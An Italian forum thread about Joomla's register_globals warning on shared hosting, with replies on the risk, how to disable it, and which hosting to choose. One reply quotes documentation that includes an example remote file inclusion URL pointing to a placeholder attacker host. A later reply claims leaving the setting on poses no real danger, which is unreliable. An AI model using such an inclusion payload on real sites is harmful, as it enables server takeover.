+ Rispondi alla Discussione
Risultati da 1 a 12 di 12

Register globals

Ultimo Messaggio di GBZ il:
  1. #1
    User L'avatar di degrelle
    Data Registrazione
    Apr 2007
    Località
    Bologna
    Messaggi
    98

    Register globals

    Salve ragazzi magari questa discussione l'avete già affrontata ma non riesco a trovare la funzione di cerca nel forum quindi apro un post nuovo di zecca.....

    Ho acquistato su Aruba un hosting linux per installare Joomla ma quando entro nell'amministratore del portale mi segnala la seguente mancanza:

    Impostazione PHP register_globals è `ON` invece di `OFF`

    Se non sbaglio per settare il tutto in maniera ottimale si dovrebbe contattare chi ci fornisce l'hosting ma non vorrei sbagliarmi........
    Qualcuno sa indicarmi come fare ed in caso dirmi cosa succederebbe lasciando cmq questa funzione scoperta???

    P.S. Ho provato ad installare una galleria immagini che mi da problemi solo su questo sito e credo dipenda da questo ma attendo vostre delucidazioni!!

  2. #2
    Esperto L'avatar di GloboGsm
    Data Registrazione
    Sep 2006
    Località
    Roma
    Messaggi
    4,085
    Dal forge di joomla:

    Register Globals
    Cosa fa?
    La funzione register_globals aiuta gli sviluppatori nella creazione di componenti. Essa infatti permette a tutti i valori che sono processati dallo script e li mette in variabili. Significa che
    index.php?foo=bar
    crea automaticamente la variabile $foo con il valore bar nello script index.php
    Perchè è un rischio? Principalmente perchè la funzione non controlla il valore. Così se vuoi sovrascrivere il path di Joomla usato per includere files, lo permette
    index.php?mos_config_livesite=http://bad.hacker.tld
    Ora l'index.php proverà ad includere questo file e caricherà un file dal server. Con questo script, l'intruso avrà accesso al tuo server.
    La funzione da sola non è un problema. Se controlli ogni variabile prima di usarne il contenuto, sei praticamente al sicuro, e ti aiuta (se sei uno sviluppatore). In Joomla questo è semplice. Per gli sviluppatori c'è una funzione chiamata mosGetParam(), che compie tutti i controlli per te ed è veramente semplice da usare. Se tutti gli sviluppatori usano questa funzione e non il register_globals, abbiamo veramente pochi problemi di sicurezza
    Come posso mettere il register_globals Off?
    Configurazione di Apache/Php
    Se hai accesso al file di configurazione del tuo server puoi scrivere
    register_globals = Off
    Devi avere un po di esperienza, o rischi che il server non risponda più
    file .htaccess
    In molti server, puoi configurare apache tramite i file .htaccess Questi file non possono essere letti dal web!
    Per creare questo file puoi creare un documento con blocco note o linux (non Word !) e inserire la linea
    php_flag register_globals off
    Se lo salvi nella cartella del tuo Joomla, metterai il tuo register_globals a off eliminando i rischi per la sicurezza
    php.ini
    Quando il file .htaccess non è accessibile, puoi usare il file php.ini
    La linea da inseirire o modificare è la seguente
    register_globals = off
    Una soluzione potrebbe essere quella di creare un file php.ini da mettere in tutte le cartelle o modificare il file php.ini del server.
    Se non hai accesso al php.ini devi richiedere al tuo provider di hosting se può metterti il register_globals a off.
    Se si rifiuta, è consigliabile cambiare hosting, in quanto si tratta di una forma di sicurezza basilare utilizzata da molti anni
    Alessandro Politanò|Article Marketing [/B]|Realizzazione Siti Web

  3. #3
    User L'avatar di degrelle
    Data Registrazione
    Apr 2007
    Località
    Bologna
    Messaggi
    98
    grazie mille sei stato esaustivo come sempre ed ora tutto mi è più chiaro, il mio Host è presso aruba secondo voi va bene per Joomla o mi consigliate qualcosa di diverso????
    Grazie ancora per l'aiuto!!

  4. #4
    Esperto L'avatar di GloboGsm
    Data Registrazione
    Sep 2006
    Località
    Roma
    Messaggi
    4,085
    Non è il massimo, ma i siti in joomla ci girano...
    certo, poi dipende da che sito devi metterci...
    Alessandro Politanò|Article Marketing [/B]|Realizzazione Siti Web

  5. #5
    User L'avatar di degrelle
    Data Registrazione
    Apr 2007
    Località
    Bologna
    Messaggi
    98
    Allora in realtà sono 2 i siti che devo costruire......
    Il primo è un semplice sito vetrina e quindi su quello non ho grossi problemi mentre il secondo è un negozio online ed ho paura che questa cosa possa darmi dei grattacapi in caso sapreste indicarmi un hosting sicuro!?!??
    Grazie mille!

  6. #6
    Esperto L'avatar di GloboGsm
    Data Registrazione
    Sep 2006
    Località
    Roma
    Messaggi
    4,085
    Per il primo, come hai già capito da solo, puoi tranquillamente sfruttare il vantaggio economico di aruba.

    Per il secondo, cercherei qualcosa di più professionale, ma non me la sento di fare nomi, in quanto, può capitare che alcuni utenti si trovino bene e altri no.
    Alessandro Politanò|Article Marketing [/B]|Realizzazione Siti Web

  7. #7
    User Newbie
    Data Registrazione
    Nov 2007
    Messaggi
    6
    Ciao a tutti,
    Intervengo nella discussione perché ho lo stesso problema: aruba mi ha risposto che non essendo su un server dedicato non posso andare a modificare il valore di Register Globals.
    Quindi mi sono posto queste domande:
    Tutti gli hosting condivisi hanno questo problema?
    Se non sono uno sviluppatore e uso solamente estensioni ufficiali o quantomeno ritenute molto affidabili, corro comunque qualche rischio?
    Qual'è il rischio effettivo di vedersi defacciato il sito se lascio Register Globals su ON?
    Grazie!

  8. #8
    Esperto L'avatar di GloboGsm
    Data Registrazione
    Sep 2006
    Località
    Roma
    Messaggi
    4,085
    ciao bizio e benvenuto nel Forum GT

    Ormai la maggior parte dei provider lo imposta già di default, purtroppo aruba ancora no
    Alessandro Politanò|Article Marketing [/B]|Realizzazione Siti Web

  9. #9
    User Newbie
    Data Registrazione
    Nov 2007
    Messaggi
    6
    Ti ringrazio per aver risposto.
    Il sito su cui ho installato joomla è aziendale, il passaggio su aruba è stato effettuato da qualche giorno. 30 euro non sono tanti, ma se dovessi rieffettuare un nuovo passaggio credo che qui non la prenderebbero troppo bene o_O :-) ...quanto rischio concretamente a lasciarlo su aruba? in altre parole: è così facile con Register Globals ON danneggiare un sito web?

    P.s.: non è che mi consiglieresti un buon provider per joomla, magari in MP?
    Grazie!

  10. #10
    GBZ
    GBZ è offline
    User L'avatar di GBZ
    Data Registrazione
    Nov 2007
    Messaggi
    303
    Pochi provider lo hanno disabilitato di default ma ti danno comunque la possibilità di avere files php.ini che ti permettano di modificare il settaggio di register globals.

  11. #11
    User Newbie
    Data Registrazione
    Nov 2007
    Messaggi
    6
    ma quindi concretamente il mio rischio è alto oppure è solo un po' più alto della media? Perché se è veramente alto cambio mnt subito...
    Oltre al provider pubblicizzato da joomla.it, quali sono quelli che permettono il settaggio di register globals?

  12. #12
    GBZ
    GBZ è offline
    User L'avatar di GBZ
    Data Registrazione
    Nov 2007
    Messaggi
    303
    Non hai reali pericoli, l'80% per cento dei siti Joomla ha register globals abilitato secondo me.

    Se vuoi un buon hosting, servizio completo e ottima assistenza (lo uso anch'io) prova hostagator.com
    C'è anche la possibilità di disabilitare register globals.

    Nel htaccess con loro puoi mettere:
    php_flag register_globals off
    php_flag mysql.allow_persistent off
    php_value max_execution_time 300
    php_value memory_limit 8M
    php_value post_max_size 20M
    php_value upload_max_filesize 20M
    oltre al resto, rewrite ecc.

+ Rispondi alla Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB è Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] è Attivato
  • Il codice [VIDEO] è Attivato
  • Il codice HTML è Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.